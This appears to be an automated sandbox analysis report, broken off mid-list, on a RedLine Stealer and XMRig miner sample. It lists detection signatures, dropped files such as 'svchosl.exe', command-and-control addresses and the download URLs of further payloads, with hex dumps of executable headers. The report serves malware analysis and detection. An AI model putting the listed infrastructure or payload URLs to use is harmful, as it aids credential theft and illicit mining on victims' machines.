Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9842440 _Py_NoneStruct,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,EVP_PBE_scrypt,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,PyExc_ValueError,PyErr_SetString,PyExc_ValueError,PyErr_SetString,PyExc_TypeError,PyErr_SetString,PyErr_Occurred,PyExc_TypeError,PyErr_SetString,PyErr_Occurred,PyExc_TypeError,PyErr_SetString,PyErr_Occurred,PyExc_TypeError,PyErr_SetString,PyExc_ValueError,PyErr_Format,PyExc_ValueError,PyErr_Format,PyExc_OverflowError,PyErr_SetString,_Py_Dealloc,PyExc_ValueError, 16_2_00007FF8B9842440

Bitcoin Miner
barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: dump.pcap, type: PCAP

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 123.exe, 00000003.00000000.2346718297.0000000000EE3000.00000002.00000001.01000000.00000008.sdmp, 123.exe, 00000003.00000002.2356568322.0000000000EE3000.00000002.00000001.01000000.00000008.sdmp, mig.exe, 0000005D.00000002.2807847716.0000000000423000.00000002.00000001.01000000.00000019.sdmp, mig.exe, 0000005D.00000000.2686679060.0000000000423000.00000002.00000001.01000000.00000019.sdmp, mig.exe.0.dr
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3285416095.00007FF8B9F6E000.00000002.00000001.01000000.00000013.sdmp, _bz2.pyd.14.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3284341028.00007FF8B9094000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: vcruntime140.amd64.pdbGCTL source: svchosl.exe, 0000000E.00000003.2368939718.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3286403821.00007FF8BA51E000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: svchosl.exe, 00000010.00000002.3284663597.00007FF8B93CD000.00000002.00000001.01000000.00000017.sdmp, _ssl.pyd.14.dr
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3285714483.00007FF8BA249000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3285071788.00007FF8B9845000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb?? source: svchosl.exe, 00000010.00000002.3283717281.00007FF8B8053000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: _.pdb source: file.exe, 00000000.00000002.3280551668.000000000485F000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.3280253389.000000000464C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079601696.0000000006DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2080087221.0000000006DC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079861670.0000000006DC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PdB] source: svchosl.exe.3.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: svchosl.exe, 00000010.00000002.3280721436.00007FF8A8A03000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: svchosl.exe, 00000010.00000002.3283717281.00007FF8B8053000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: svchosl.exe, 00000010.00000002.3282402293.00007FF8A8DFD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3286731624.00007FF8BFAB3000.00000002.00000001.01000000.00000012.sdmp, select.pyd.14.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: svchosl.exe, 00000010.00000002.3280721436.00007FF8A8A03000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: svchosl.exe, 00000010.00000002.3286058819.00007FF8BA501000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3284341028.00007FF8B9094000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: svchosl.exe, 0000000E.00000003.2368939718.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3286403821.00007FF8BA51E000.00000002.00000001.01000000.0000000E.sdmp
Source: C:\Users\123.exe Code function: 3_2_00EBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 3_2_00EBA69B
Source: C:\Users\123.exe Code function: 3_2_00ECC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 3_2_00ECC220
Source: C:\Users\123.exe Code function: 3_2_00EDB348 FindFirstFileExA, 3_2_00EDB348
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B3276F0 FindFirstFileExW,FindClose, 14_2_00007FF77B3276F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B326B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 14_2_00007FF77B326B80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B341674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 14_2_00007FF77B341674
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B3276F0 FindFirstFileExW,FindClose, 16_2_00007FF77B3276F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B326B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 16_2_00007FF77B326B80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B341674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 16_2_00007FF77B341674
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4462 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte, 16_2_00007FF8A87C4462
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_07C44BE0
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_07C44B24
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_07C44AE2
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 0_2_07C44AE8
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_07D3D140
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_084E9848
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_084E983C
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov ecx, dword ptr [ebp-3Ch] 0_2_0851C9CC
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov ecx, dword ptr [ebp-3Ch] 0_2_0851CDF0
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then inc dword ptr [ebp-20h] 0_2_085BB270
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 08988EEDh 0_2_08988C18
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 0898C3DBh 0_2_0898BE98
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 08989711h 0_2_08988F90
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 08985401h 0_2_089853E9
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 08987F45h 0_2_08987F24

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.5:49704 -> 147.45.78.229:43674
Source: Traffic Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49704 -> 147.45.78.229:43674
Source: Traffic Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 147.45.78.229:43674 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 147.45.78.229:43674 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49712 -> 77.221.149.185:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 147.45.78.229:43674
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49704 -> 147.45.78.229:43674
Source: global traffic TCP traffic: 192.168.2.5:49713 -> 77.221.149.185:5988
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 20:52:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 01 Jul 2024 21:53:52 GMTETag: "5723fc-61c36a2003c00"Accept-Ranges: bytesContent-Length: 5710844Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 c8 01 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 50 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 e0 00 00 00 40 06 00 00 e2 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 30 07 00 00 24 00 00 00 c4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 20:52:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 24 Jun 2024 07:21:38 GMTETag: "2cf6b5b-61b9da1c32480"Accept-Ranges: bytesContent-Length: 47147867Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 c8 01 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 50 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 07 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 e0 00 00 00 40 06 00 00 e2 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 30 07 00 00 24 00 00 00 c4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /clients/123.exe HTTP/1.1Host: 77.221.149.185Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /clients/mig.exe HTTP/1.1Host: 77.221.149.185
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.78.229
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA2463D8 recv, 16_2_00007FF8BA2463D8
Source: global traffic HTTP traffic detected: GET /clients/123.exe HTTP/1.1Host: 77.221.149.185Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /clients/mig.exe HTTP/1.1Host: 77.221.149.185
Source: file.exe, 00000000.00000002.3280784216.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.00000000049DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://77.221.149.185
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297755975.00000000089E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297306478.00000000089D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.221.149.185/clients/123.exe
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://77.221.149.185/clients/mig.exe
Source: svchosl.exe, 00000010.00000002.3277924522.0000021306780000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://bitbucket.org/techtonik/python-pager
Source: svchosl.exe, 00000010.00000002.3277478424.00000213065F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://bitbucket.org/techtonik/python-wget/
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 